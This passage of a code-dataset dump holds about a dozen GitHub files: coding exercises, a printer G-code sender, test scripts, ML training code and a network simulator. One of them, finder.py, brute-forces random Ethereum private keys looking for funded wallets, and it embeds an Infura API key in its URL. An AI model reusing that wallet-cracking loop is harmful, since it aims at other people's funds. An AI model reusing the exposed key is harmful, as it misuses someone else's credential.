matrice1[i][j]*matrice2[k][i]\n ligne.append(elelment)\n produit_matrices.append(ligne)\n return produit_matrices\n\nX = [[12,7,3],\n [4 ,5,6],\n [7 ,8,9]]\nY = [[5,8,1,2],\n [6,7,3,0],\n [4,5,9,1]]\nprint(produitMatriciel(X,Y))\n","repo_name":"Philtesting/Exercice-Python","sub_path":"4eme cours/Programme/Matrice.py","file_name":"Matrice.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22563366118","text":"import serial\nimport matplotlib.pyplot as plt\n\nser = serial.Serial('/dev/ttyUSB0', 115200)\n\ndef get_gcode_from_vector(points, contours):\n arr = [];\n\n gcode = []\n first_point = 0\n for number_of_points_in_contour in contours:\n for i in range(first_point, number_of_points_in_contour + 1):\n x = points[i][0] + 100\n y = points[i][1] + 100\n\n arr.append((x, y))\n\n gcode.append(\"G1X\" + str(x) + \"Y\" + str(y))\n\n if i is first_point:\n gcode.append(\"G1Z1\")\n arr.append((points[first_point][0] + 100, points[first_point][1] + 100))\n gcode.append(\"G1X\" + str(points[first_point][0] + 100) + \"Y\" + str(points[first_point][1] + 100))\n first_point = number_of_points_in_contour + 1\n gcode.append(\"G1Z5\")\n\n print(arr)\n\n plt.plot(*zip(*arr))\n arr = []\n\n plt.show()\n\n return gcode\n\ndef send_codes_to_printer(codes):\n for code in codes:\n ser.write((code + '\\n').encode())\n while True:\n result = ser.readline()\n print(result)\n if result == b\"ok\\n\":\n break\n","repo_name":"Xeyler/printerm","sub_path":"printerm/vector2gcode.py","file_name":"vector2gcode.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25792205399","text":"#Two Sum 2 leetcode 167\nclass TwoSum2Solution:\n def twoSum(self, numbers, target):\n valuesToReturn = {}\n for index, num in enumerate(numbers):\n if target - num in valuesToReturn:\n return [valuesToReturn[target - num], index + 1]\n else:\n valuesToReturn[num] = index + 1\n\n#Majority Element\nclass MajorityElementSolution:\n def majorityElement(self, nums):\n count = {}\n for num in nums:\n if num not in count:\n count[num] = 1\n if count[num] > len(nums) / 2:\n return num\n else:\n count[num] += 1\n\n#factorial Trailing zeroes\nclass ZeroCountFactorialSolution:\n def trailingZeroes(self, n):\n zeroCount = 0\n while n > 0:\n n //= 5\n zeroCount += n\n return zeroCount\n","repo_name":"jameszhu1/LeetCodeProblems","sub_path":"week2/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26229828053","text":"import zoo\nimport sys\n\ndef echo(conf,inputs,outputs):\n if \"a\" in inputs:\n outputs[\"a\"][\"value\"]=inputs[\"a\"][\"value\"]\n if \"mimeType\" in inputs[\"a\"]:\n outputs[\"a\"][\"mimeType\"]=inputs[\"a\"][\"mimeType\"]\n if \"mediaType\" in inputs[\"a\"]:\n outputs[\"a\"][\"mediaType\"]=inputs[\"a\"][\"mediaType\"]\n if \"encoding\" in inputs[\"a\"]:\n outputs[\"a\"][\"encoding\"]=inputs[\"a\"][\"encoding\"]\n else:\n outputs[\"a\"][\"value\"]=\"Empty\"\n if \"b\" in inputs:\n outputs[\"b\"][\"value\"]=inputs[\"b\"][\"value\"]\n if \"dataType\" in inputs[\"b\"]:\n outputs[\"b\"][\"dataType\"]=inputs[\"b\"][\"dataType\"]\n else:\n outputs[\"b\"][\"value\"]=\"Empty\"\n if \"c\" in inputs:\n outputs[\"c\"][\"value\"]=inputs[\"c\"][\"value\"]\n else:\n outputs[\"c\"][\"value\"]=\"Empty\"\n print(inputs[\"c\"],file=sys.stderr)\n return zoo.SERVICE_SUCCEEDED\n","repo_name":"omshinde/ZOO-Project-1","sub_path":"zoo-project/zoo-services/echo-py/cgi-env/echo_service.py","file_name":"echo_service.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"718575607","text":"import time\nimport json\n\nfrom pageObjects.CommonPage import CommonPage\nfrom pageObjects.HomePage import HomePage\nfrom pageObjects.SearchPage import SearchPage\n\nclass Test_Quiz():\n \"\"\"\n Class contains test cases specified in the quiz to validate foreign exchange portal.\n \"\"\"\n\n def setup_method(self, method):\n \"\"\"\n setup_method : to initialise the test data before every testcase\n \"\"\"\n f = open(\".\\\\conf\\\\test_data.json\", \"r\")\n self.test_data = json.loads(f.read())\n f.close()\n\n def teardown_method(self, method):\n \"\"\"\n teardown_method : to close the browser after every testcase\n \"\"\"\n self.driver.quit()\n\n def test_question2(self, setup):\n \"\"\"\n test_question2 function validates question 2 of the assignment.\n It is a positive testcase to validate following workflow\n\n Marks the testcase as Pass if all the above steps are working as mentioned,\n else marks the testcase as Fail\n \"\"\"\n # 1. Open the following URL: https://www.moneycorp.com/en-gb/\n self.driver.get(self.test_data[\"common\"][\"url\"])\n\n # 2. Change the language and region from the top right corner to USA (English).\n common_page = CommonPage(self.driver)\n\n # Modal appears at bottom, click on accept Cookies\n common_page.accept_cookies()\n\n # Select language to USA\n common_page.select_locale()\n\n # 3. Click Find out more for “Foreign exchange solutions”\n home_page = HomePage(self.driver)\n home_page.click_foreign_exchange_solution()\n\n # Validate if you have arrived on the page\n home_page.verify_title() # TBD just to inform the verification failure\n\n # 4. Search for the word “international payments” using the search box\n common_page.search(self.test_data[\"test_question2\"][\"string_to_be_searched\"])\n\n # 5. Validate if you have arrived on the result page\n search_page = SearchPage(self.driver)\n search_page.verify_title() # TBD just to inform the verification failure\n\n # 6. Validate that each article in the list displays a link that starts with https://www.moneycorp.com/en-us/\n assert search_page.verify_links(self.test_data[\"test_question2\"][\"article_url_prefix\"])\n\n # Delay added at last just for demo purpose\n time.sleep(5)\n\n # We can include following components if required and have sufficient time:\n # logging module\n # reporting module\n # configuration reader class\n # marker\n # locator management class\n # test data management class","repo_name":"nemjain962/Assignment_2","sub_path":"test_cases/test_foreign_exchange.py","file_name":"test_foreign_exchange.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26999851401","text":"from plt_testing import *\n\nt = get_example_trace('anon-v4.pcap')\n\nn = nfp = 0; offset = 12\nfor pkt in t:\n n += 1\n\n if pkt.udp and (pkt.udp.src_port == 53 or pkt.udp.dst_port == 53):\n nfp += 1\n\n test_println(\"%4d:\" % (n), get_tag())\n print_udp(pkt.udp, offset, get_tag(\"n:\"+str(n)))\n test_println('')\n\n if nfp == 4:\n break\n\ntest_println(\"%d raw -> %d filtered packets\" % (n, nfp), get_tag())\n","repo_name":"nevil-brownlee/python-libtrace","sub_path":"test/v2-test-cases/test-sw-filter.py","file_name":"test-sw-filter.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"2600260196","text":"from web3 import Web3\nfrom Crypto.Hash import keccak\nimport ecdsa\nimport time\nimport keyboard # Using keyboard to detect key press to stop the program\n\nw3 = Web3(Web3.HTTPProvider('https://mainnet.infura.io/v3/cc3faa47b8dc4c26ae1ad24898dc47ba'))\n\n\ndef keccak256(data):\n k_hash = keccak.new(digest_bits=256)\n k_hash.update(data)\n return k_hash.hexdigest()\n\n\ndef generate_ethereum_address():\n private_key = ecdsa.SigningKey.generate(curve=ecdsa.SECP256k1)\n private_key_hex = private_key.to_string().hex()\n\n public_key = private_key.get_verifying_key().to_string()\n public_key_hex = \"04\" + public_key.hex()\n\n # Get the keccak-256 hash of the public key\n hashed_public_key = keccak256(bytes.fromhex(public_key_hex))\n\n # Take the last 20 bytes of this hash\n address = \"0x\" + hashed_public_key[-40:]\n return private_key_hex, address\n\n\ndef check_balance(address):\n checksum_address = Web3.to_checksum_address(address)\n balance = w3.eth.get_balance(checksum_address)\n return balance / (10**18)\n\n\n# The main loop\ntry:\n count = 0\n while True:\n count += 1\n private_key_hex, address = generate_ethereum_address()\n balance = check_balance(address)\n\n if balance > 0:\n print(\n f\"Found an address with a balance! Address : {address}, Balance: {balance}, Private Key: {private_key_hex}\")\n\n if count % 10 == 0:\n timestamp = time.strftime('%Y-%m-%d %H:%M:%S')\n print(f\"{count} addresses checked at {timestamp}\")\n\n # Stop if 'esc' key is pressed\n # if keyboard.is_pressed(''):\n # timestamp = time.strftime('%Y-%m-%d %H:%M:%S')\n # print(f\"Stopping at {timestamp}, after checking {count} addresses.\")\n # break\n\n time.sleep(0.01) # Small delay to not overwhelm the CPU\nexcept KeyboardInterrupt:\n # Handle any manual interruption (Ctrl+C)\n print(\"\\nProgram has been stopped manually.\")\n","repo_name":"skg4463/Ethereum_privateKey_finder","sub_path":"finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3630662010","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the substrings function below.\ndef substrings(n):\n count = 0\n pre_digit = 0\n for i in range(len(n)):\n pre_digit = (pre_digit * 10 + int(n[i]) * (i + 1))%(10**9 + 7)\n count = (count + pre_digit)%(10**9 + 7)\n\n return int(count)\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = input()\n\n result = substrings(n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"encgoo/hackerrank","sub_path":"DynamicProgramming/sam_and_substring.py","file_name":"sam_and_substring.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38793118058","text":"# coding: utf-8\nimport ui\n\nmain = ui.load_view('Views/main')\nend = ui.load_view('Views/game_over')\nstart = ui.load_view('Views/menu')\n\nimg = end['view1']['imageview1']\ntext = end['view1']['label1']\nimg.image = ui.Image().named('iob:social_twitter_outline_256')\nwords =5\nminutes='00:00'\ntext.text = 'I wrote {} words in {} minutes - and then I died using the Not as Dangerous Writing App @TutorialDoctor'.format(words,minutes)\n\nstart.present(hide_title_bar= True)\nmain.present(hide_title_bar = True)\nend.present(hide_title_bar=True)","repo_name":"LokiPlush1/Loki","sub_path":"Projects/UI/Not So Dangerous Writing App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42832336065","text":"from pathlib import Path\n\nfrom nxontology import NXOntology\nfrom nxontology.node import NodeT\n\nROOT_DIR: Path = Path(__file__).parent.parent\n\n# Will require override on Windows\nCACHE_DIR = Path(\"/tmp/nxontology-ml/cache\")\n\n\ndef get_output_directory(nxo: NXOntology[NodeT], parent_dir: Path = ROOT_DIR) -> Path:\n \"\"\"Get output directory for an nxontology, using the ontology name for the directory.\"\"\"\n assert nxo.name is not None\n directory = parent_dir.joinpath(\"output\", nxo.name)\n directory.mkdir(parents=True, exist_ok=True)\n return directory\n","repo_name":"related-sciences/nxontology-ml","sub_path":"nxontology_ml/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"70118516325","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nimport csv\n\ntorch.manual_seed(0)\n\n\nclass MyDataLoader:\n def __init__(self, *file_paths):\n self.file_paths = file_paths\n self.data = []\n\n def load_data(self):\n for file_path in self.file_paths:\n with open(file_path, 'r') as file:\n data = list(csv.reader(file))\n self.data.append(np.array(data, float))\n return [torch.from_numpy(data.T).to(torch.float32) for data in self.data]\n\n\nclass MyModel(nn.Module):\n def __init__(self):\n super(MyModel, self).__init__()\n self.fc1 = nn.Linear(420, 200)\n self.fc2 = nn.Linear(200, 100)\n self.fc3 = nn.Linear(100, 10)\n\n def forward(self, x):\n x = torch.relu(self.fc1(x))\n x = torch.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n\nclass MyTrainer:\n def __init__(self, model, input_data, input_data2, test_data, num_epochs=6000, learning_rate=0.001, patience=10):\n self.model = model\n self.input_data = input_data\n self.input_data2 = input_data2\n self.test_data = test_data\n self.num_epochs = num_epochs\n self.patience = patience\n self.criterion = nn.MSELoss()\n self.optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n self.best_loss = np.inf\n self.early_stopping_counter = 0\n self.current_loss = None\n\n def train(self):\n for epoch in range(self.num_epochs):\n output_data = self.model(self.input_data)\n loss = self.criterion(output_data, self.input_data2)\n self.current_loss = loss.item()\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n if self.current_loss < self.best_loss:\n self.best_loss = self.current_loss\n self.early_stopping_counter = 0\n else:\n self.early_stopping_counter += 1\n\n if self.early_stopping_counter >= self.patience:\n print(f\"Early stopping at epoch {epoch + 1}\")\n break\n\n print(f\"Epoch [{epoch + 1}/{self.num_epochs}], Loss: {self.current_loss}\")\n\n def test(self):\n self.model.eval()\n with torch.no_grad():\n output_data = self.model(self.test_data)\n return output_data\n\n\nif __name__ == \"__main__\":\n file_paths = [\"Prb_data/Prb02data01.csv\", \"Prb_data/Prb02data02.csv\", \"Prb_data/Prb02data03.csv\"]\n data_loader = MyDataLoader(*file_paths)\n input_data, input_data2, test_data = data_loader.load_data()\n\n model = MyModel()\n trainer = MyTrainer(model, input_data, input_data2, test_data, learning_rate=0.001, patience=20)\n trainer.train()\n print(\"Final Loss:\", trainer.current_loss)\n\n test_output = trainer.test()\n\n print(\"Test Output Size:\", test_output.size())\n print(\"Test Output:\", test_output)","repo_name":"LEE-hyeon0771/DeepLearning_basic","sub_path":"AI's mathmatics/Neuralnet_train_test.py","file_name":"Neuralnet_train_test.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70507173925","text":"from transformers import AutoModelForSequenceClassification, Trainer, AutoTokenizer\nimport torch\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nfrom datasets import load_dataset\nemotions = load_dataset('csv', data_files={'train': [r\"E:\\Projects\\DSI_Gihan\\propaganda_detection\\ready_for_training.csv\"],\n 'validation': [r\"E:\\Projects\\DSI_Gihan\\propaganda_detection\\ready_for_dev.csv\"],\n 'test':[r\"E:\\Projects\\DSI_Gihan\\propaganda_detection\\ready_for_test.csv\"]})\n\n\nmodel_name = \"E:\\Projects\\DSI_Gihan\\propaganda_detection\\propaganda_model\"\n\n\nmodel = AutoModelForSequenceClassification.from_pretrained(model_name)\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\ndef tokenize(batch):\n return tokenizer(batch[\"text\"], padding=True, truncation=True)\n\nemotions_encoded = emotions.map(tokenize, batched=True, batch_size=None)\n\n\n\nemotions_encoded.set_format(\"torch\", columns=[\"input_ids\", \"attention_mask\", \"label\"])\n\n\ntrainer = Trainer(model=model)\ntrainer.model = model.cuda()\ny = trainer.predict(emotions_encoded[\"test\"])\n\n\n\nlabel_dict = {\n 'Black-and-white Fallacy/Dictatorship':0,\n 'Slogans':1,\n 'Name calling/Labeling':2,\n 'Loaded Language':3,\n 'Smears':4,\n 'Causal Oversimplification':5,\n 'Exaggeration/Minimisation':6,\n 'Appeal to fear/prejudice':7,\n 'Reductio ad hitlerum':8,\n 'Repetition':9,\n 'Glittering generalities (Virtue)':10,\n \"Misrepresentation of Someone's Position (Straw Man)\":11,\n 'Doubt':12,\n 'Obfuscation, Intentional vagueness, Confusion':13,\n 'Whataboutism':14,\n 'Flag-waving':15,\n 'Thought-terminating cliché':16,\n 'Presenting Irrelevant Data (Red Herring)':17,\n 'Appeal to authority':18,\n 'Bandwagon':19}\n\nlabels = y.label_ids\n\nfor lbl in labels:\n keys = [k for k, v in label_dict.items() if v == lbl]\n print(keys)\n# print(y.label_ids)","repo_name":"GihanMora/Extreme_LexiBERTa","sub_path":"propaganda_detection/predict_using_finetuned_model.py","file_name":"predict_using_finetuned_model.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40986727071","text":"import importlib\nimport simpy\nimport functools\nimport random\nimport time\nfrom enum import Enum\nimport numpy\nfrom scipy.stats import norm\nimport scipy as sp\nimport scipy.stats\nimport matplotlib.pyplot as plt\nimport copy\nimport simulator as sim\nimport graph as g\n\n#auxiliar list that keeps the plot markers and colors\nmarkers = ['o', 'v', '^', '<', '>', 's', 'p', 'h', 'H', '+', '<','>']\ncolors = ['b','g','r','c','m', 'y', 'k', 'r', 'b', 'g', 'r', 'c']\n\n#reset markers and colors\ndef resetMarkers():\n\tglobal markers, colors\n\tmarkers = ['o', 'v', '^', '<', '>', 's', 'p', 'h', 'H', '+', '<','>']\n\tcolors = ['b','g','r','c','m', 'y', 'k', 'r', 'b', 'g', 'r', 'c']\n\n#get the blocking probability from the blocked packets and the total generated packets\ndef calcBlocking(blocked, generated):\n\tblocking_probability = []\n\t#iterate over the collection of values in both lists\n\tfor i in range(len(generated)):\n\t\tblock_list = blocked[i]\n\t\tgen_list = generated[i]\n\t\t#now, iterate over the lists and calculates the blocking probability\n\t\tfor j in range(len(gen_list)):\n\t\t\tif gen_list[j] == 0:\n\t\t\t\tblocking_probability.append(0.0)\n\t\t\telse:\n\t\t\t\tblocking_probability.append(block_list[j]/gen_list[j])\n\treturn blocking_probability\n\n\n#Logging\n#generate logs\ndef genLogs(removeHeuristic):\n\t#iterate over each scheduling policy\n\tfor i in sched_pol:\n\t\t#power consumption\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/power/power_consumption_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_power_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\t#blocked\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/blocked/blocked_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_blocking_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t #blocking probability\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/blocking/blocking_probability_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_blocking_prob_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\t#execution times\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/exec/exec_times_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_exec_time_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\t#average delay\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/delay/avg_delay_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_delay_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\t#lambda usage\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/lambda/lambda_usage_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in total_lambda_usage_mean[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\n\t\t#confidence interval\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/power_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in power_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/blocking_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in blocking_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/exec_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in exec_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/delay_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in delay_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\t\twith open('/home/tinini/Área de Trabalho/ons/elsevier/confidence/lambda_usage_{}_{}_{}_{}_{}.txt'.format(i,removeHeuristic, g.rrhs_amount, len(g.available_vpons), g.cpri_line),'a') as filehandle: \n\t\t filehandle.write(\"{}\\n\\n\".format(i))\n\t\t filehandle.writelines(\"%s\\n\" % p for p in lambda_usage_ci[\"{}\".format(i)])\n\t\t filehandle.write(\"\\n\")\n\t\t filehandle.write(\"\\n\")\n\n#number of executions\nexecution_times = 15\n#scheduling policies\nsched_pol = []\nsched_pol.append(\"cloud_first_all_fogs\")\nsched_pol.append(\"fog_first\")\nsched_pol.append(\"most_loaded\")\nsched_pol.append(\"least_loaded\")\n#vpon removing policies\nremove_pol = []\nremove_pol.append(\"fog_first\")\nremove_pol.append(\"cloud_first\")\nremove_pol.append(\"random_remove\")\n\n#create the lists to keep the results from\naverage_power = {}\naverage_blocking = {}\ntotal_reqs = {}\nexec_times = {}\nblocking_prob = {}\navg_delay = {}\navg_lambda_usage = {}\nfor i in sched_pol:\n\taverage_power[\"{}\".format(i)] = []\n\taverage_blocking[\"{}\".format(i)] = []\n\ttotal_reqs[\"{}\".format(i)] = []\n\texec_times[\"{}\".format(i)] = []\n\tblocking_prob[\"{}\".format(i)] = []\n\tavg_delay[\"{}\".format(i)] = []\n\tavg_lambda_usage[\"{}\".format(i)] = []\n\n#resets the lists\ndef resetLists():\n\tglobal average_power, average_blocking, total_reqs, exec_times, avg_delay, avg_lambda_usage\n\t#create the lists to keep the results from\n\taverage_power = {}\n\taverage_blocking = {}\n\ttotal_reqs = {}\n\texec_times = {}\n\tblocking_prob = {}\n\tavg_delay = {}\n\tfor i in sched_pol:\n\t\taverage_power[\"{}\".format(i)] = []\n\t\taverage_blocking[\"{}\".format(i)] = []\n\t\ttotal_reqs[\"{}\".format(i)] = []\n\t\texec_times[\"{}\".format(i)] = []\n\t\tblocking_prob[\"{}\".format(i)] = []\n\t\tavg_delay[\"{}\".format(i)] = []\n\t\tavg_lambda_usage[\"{}\".format(i)] = []\n\n#this function reloads the graph module\ndef reloadGraphModule():\n importlib.reload(g)\n\n#general function to reload modules\ndef reloadModule(aModule):\n importlib.reload(aModule)\n\n\nresetMarkers()\nresetLists()\n\ndef getBlocking(block, reqs):\n\ttotal_blocking = []\n\tfor i in range(len(block)):\n\t\tif block[i] == 0:\n\t\t\ttotal_blocking.append(0)\n\t\telse:\n\t\t\ttotal_blocking.append(block[i]/reqs[i])\n\treturn total_blocking\n\nfor i in sched_pol:\n\tprint(\"Executions of heuristic {}\".format(i))\n\t#begin the experiments\n\tfor j in range(execution_times):\n\t\tprint(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\t\tprint(\"Execution #{} of heuristic {}\".format(j,i))\n\t\tprint(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\t\t#simulation environment\n\t\tenv = simpy.Environment()\n\t\t#create the graph\n\t\tgp = g.createGraph()\n\t\t#create the control plane\n\t\tcp = sim.Control_Plane(env, \"Graph\", gp, i, \"fog_first\")\n\t\t#traffic generator\n\t\ttg = sim.Traffic_Generator(env,sim.distribution, None, cp)\n\t\t#create the rrhs\n\t\tcp.createRRHs(g.rrhs_amount,env)\n\t\trandom.shuffle(g.rrhs)\n\t\t#create fog nodes\n\t\tg.addFogNodes(gp, g.fogs)\n\t\t#add RRHs to the graph\n\t\tg.addRRHs(gp, 0, 64, \"0\")\n\t\tg.addRRHs(gp, 64, 128, \"1\")\n\t\tg.addRRHs(gp, 128, 192, \"2\")\n\t\tg.addRRHs(gp, 192, 256, \"3\")\n\t\tg.addRRHs(gp, 256, 320, \"4\")\n\t\tg.addRRHs(gp, 320, 384, \"5\")\n\t\tg.addRRHs(gp, 384, 448, \"6\")\n\t\tg.addRRHs(gp, 448, 512, \"7\")\n\t\tg.addRRHs(gp, 512, 576, \"8\")\n\t\tg.addRRHs(gp, 576, 640, \"9\")\n\t\t#starts the simulation\n\t\tenv.run(until = 86401)\n\t\taverage_power[\"{}\".format(i)].append(sim.average_power_consumption)\n\t\taverage_blocking[\"{}\".format(i)].append(sim.average_blocking_prob)\n\t\ttotal_reqs[\"{}\".format(i)].append(sim.total_requested)\n\t\texec_times[\"{}\".format(i)].append(sim.average_execution_time)\n\t\tavg_lambda_usage[\"{}\".format(i)].append(sim.avg_lambda_usage)\n\t\t#print(average_blocking)\n\t\t#blocking_prob[\"{}\".format(i)].append(calcBlocking(average_blocking[\"{}\".format(i)], total_reqs[\"{}\".format(i)]))\n\t\tblocking_prob[\"{}\".format(i)].append(getBlocking(sim.average_blocking_prob, sim.total_requested))\n\t\t#print(blocking_prob)\n\t\tavg_delay[\"{}\".format(i)].append(sim.average_delay_time)\n\t\treloadGraphModule()\n\t\treloadModule(sim)\n\n#to calculate the confidence interval\ndef mean_confidence_interval(data, confidence=0.95):\n a = 1.0*numpy.array(data)\n n = len(a)\n m, se = numpy.mean(a), scipy.stats.sem(a)\n h = se * sp.stats.t._ppf((1+confidence)/2., n-1)\n #return m, m-h, m+h\n return h\n\n#calculate the confidence interval\n#lists to keep confidence interval\npower_ci ={}\nblocking_ci ={}\nexec_ci = {}\ndelay_ci = {}\nlambda_usage_ci = {}\n\nfor i in sched_pol:\n\tpower_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*average_power[\"{}\".format(i)])]\n\tblocking_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*blocking_prob[\"{}\".format(i)])]\n\texec_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*exec_times[\"{}\".format(i)])]\n\tdelay_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*avg_delay[\"{}\".format(i)])]\n\tlambda_usage_ci[\"{}\".format(i)] = [mean_confidence_interval(col, confidence = 0.95) for col in zip(*avg_lambda_usage[\"{}\".format(i)])]\n\n#calculate the means from the executions\n#power consumption means\ntotal_power_mean = {}\nfor i in sched_pol:\n\ttotal_power_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*average_power[\"{}\".format(i)])]\n\n#blocking means\ntotal_blocking_mean = {}\nfor i in sched_pol:\n\ttotal_blocking_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*average_blocking[\"{}\".format(i)])]\n\n#execution times means\ntotal_exec_time_mean = {}\nfor i in sched_pol:\n\ttotal_exec_time_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*exec_times[\"{}\".format(i)])]\n\n#blocking probability means\ntotal_blocking_prob_mean = {}\nfor i in sched_pol:\n\ttotal_blocking_prob_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*blocking_prob[\"{}\".format(i)])]\n\n#average delay means\ntotal_delay_mean = {}\nfor i in sched_pol:\n\ttotal_delay_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in zip(*avg_delay[\"{}\".format(i)])]\n\n#average lambda usage means\ntotal_lambda_usage_mean = {}\nfor i in sched_pol:\n\ttotal_lambda_usage_mean[\"{}\".format(i)] = [float(sum(col))/len(col) for col in 